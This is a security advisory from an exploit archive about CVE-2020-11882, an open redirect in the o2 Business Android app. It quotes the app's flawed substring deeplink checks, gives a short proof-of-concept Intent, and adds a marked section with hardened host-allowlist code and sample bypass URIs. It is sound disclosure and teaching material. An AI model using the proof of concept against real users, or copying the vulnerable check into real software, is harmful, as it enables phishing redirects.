Android o2 Business 1.2.0 Open Redirect

Posted Jul 3, 2020
Authored by Julien Ahrens | Site rcesecurity.com

o2 Business for Android version 1.2.0 suffers from an open redirection vulnerability.

tags | exploit
advisories | CVE-2020-11882
SHA-256 | ed073540b55db066df4e43d61452b19af671d57a6dad0ef1271c98600b232356

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: o2 Business for Android
Vendor URL: https://play.google.com/store/apps/details?id=telefonica.de.o2business
Type: Open Redirect [CWE-601]
Date found: 2020-04-16
Date published: 2020-07-01
CVSSv3 Score: 3.3 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE: CVE-2020-11882


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
o2 Business App for Android 1.2.0


4. INTRODUCTION
===============
Communication is your daily springboard into the business world. And with the
new O2 Business App you always have all the important details in view. Trace
back the call time you have invested and see the communication capacity you
have available in advance. From the current status of your inclusive volume,
through itemised call records and tariff details, to local network quality, the
O2 Business App keeps you fully informed anytime, anywhere. Find out more now
about your informative companion!

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The "O2 Business App" for Android exposes an activity to other apps called
"canvasm.myo2.SplashActivity". The purpose of this activity is to handle
deeplinks which can be delivered to the app either via links or by directly
calling the activity.

However, the app does not properly validate the format of deeplinks: it merely
uses str.contains() to check for an allowed host, so the trusted prefix is
accepted wherever it appears in the string:

private boolean isVanityLink(String str) {
    return str.contains("https://o2.de") || str.contains("https://blau.de")
        || str.contains("https://e2e2.o2.de")
        || str.contains("https://e2e2.blau.de");
}

private boolean isDeepLink(String str) {
    return str.contains("https://www.o2online.de")
        || str.contains("https://www.blau.de")
        || str.contains("https://e2e2.o2online.de")
        || str.contains("https://e2e2.blau.de")
        || str.contains(BuildConfig.PIRANHA_BASE_E2E2_URL)
        || str.contains("https://login.o2online.de")
        || str.contains("https://login-e2e2.blau.de")
        || str.contains("https://login.blau.de");
}

This can be abused by an attacker (a malicious app on the same device) to
redirect the user to any page and deliver arbitrary content to them. An example
exploit could look like the following:

Intent i = new Intent();
i.setComponent(new ComponentName("telefonica.de.o2business", "canvasm.myo2.SplashActivity"));
Uri uri = Uri.parse("https://www.rcesecurity.com?dummy=https://o2.de");
i.setData(uri);
startActivity(i);
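The following is an added example, not code from the advisory or from the app, that places the substring pattern described above beside a hardened check which parses the deeplink and compares scheme and host against an exact allowlist. It uses java.net.URI so that it runs as plain Java outside Android; the allowlist and the sample inputs are constructed here from the hostnames in the advisory, and the host behind BuildConfig.PIRANHA_BASE_E2E2_URL is left out because its value is not given.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class DeepLinkHostCheck {

    // Exact-host allowlist, constructed for this example from the literal
    // hostnames in the advisory's isVanityLink()/isDeepLink(). The
    // BuildConfig.PIRANHA_BASE_E2E2_URL entry is omitted (value not on the page).
    private static final Set<String> ALLOWED_HOSTS = new HashSet<>(Arrays.asList(
            "o2.de", "blau.de", "e2e2.o2.de", "e2e2.blau.de",
            "www.o2online.de", "www.blau.de", "e2e2.o2online.de",
            "login.o2online.de", "login-e2e2.blau.de", "login.blau.de"));

    // The vulnerable pattern from the advisory (condensed to two hosts): a
    // substring search succeeds no matter where the trusted prefix appears.
    static boolean isAllowedVulnerable(String str) {
        return str.contains("https://o2.de") || str.contains("https://blau.de");
    }

    // Hardened check: parse the string as a URI, require the https scheme, and
    // compare the parsed host against the allowlist exactly. Input that does
    // not parse, has no host, or uses another scheme is rejected.
    static boolean isAllowedHardened(String str) {
        URI uri;
        try {
            uri = new URI(str);
        } catch (URISyntaxException e) {
            return false;
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String host = uri.getHost(); // null when the authority is not a valid host
        if (host == null || host.isEmpty()) {
            return false;
        }
        return ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    public static void main(String[] args) {
        // Constructed inputs: the advisory's PoC URI, variants of the same class
        // (trusted host in the path, fragment, userinfo, or as a subdomain
        // prefix; attacker.example is a reserved placeholder domain), plus two
        // legitimate links that must still pass the hardened check.
        String[] samples = {
                "https://www.rcesecurity.com?dummy=https://o2.de", // advisory PoC
                "https://attacker.example/https://o2.de",
                "https://attacker.example/#https://o2.de",
                "https://o2.de@attacker.example/",
                "https://o2.de.attacker.example/",
                "http://o2.de/",
                "https://o2.de/",
                "https://login.o2online.de/start?x=1",
        };
        for (String s : samples) {
            System.out.printf("%-52s vulnerable=%-5b hardened=%b%n",
                    s, isAllowedVulnerable(s), isAllowedHardened(s));
        }
    }
}
```

Run with `javac DeepLinkHostCheck.java && java DeepLinkHostCheck`. Every row except the last two is accepted by the substring check and rejected by the parsed-host check. On Android the same comparison belongs on the scheme and host of the parsed Uri object the activity actually opens, never on the raw deeplink string.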


6. RISK
=======
A malicious app on the same device is able to exploit this vulnerability to lead
the user to any webpage/content. The specific problem here is the assumed trust
boundary between the user having the o2 Business app installed and what the app
is actually doing/displaying to the user. If the user sees the app being loaded
and then automatically redirecting to another page, the user will likely assume
that the loaded page is also trustworthy.


7. SOLUTION
===========
Update the app to version 1.3.0


8. REPORT TIMELINE
==================
2020-04-16: Discovery of the vulnerability
2020-04-16: Although Telefonica runs a VDP on Bugcrowd
(https://bugcrowd.com/telefonicavdp), I did not want to accept their
non-disclosure terms, which is why I tried to contact them directly via their
official CERT contact.
2020-04-16: Telefonica responds and asks for full vulnerability details
2020-04-16: Sent over the full advisory including a full PoC exploit.
2020-04-16: Telefonica acknowledges the issue
2020-04-16: CVE requested from MITRE
2020-04-17: MITRE assigns CVE-2020-11882
2020-06-03: No further communication from Telefonica. Mailed them again about
the status of the fix.
2020-06-03: Telefonica is still working on this issue and the fix is scheduled
to be included in the next release.
2020-06-04: Version 1.3.0 is released
2020-07-01: Public disclosure.


9. REFERENCES
=============
-

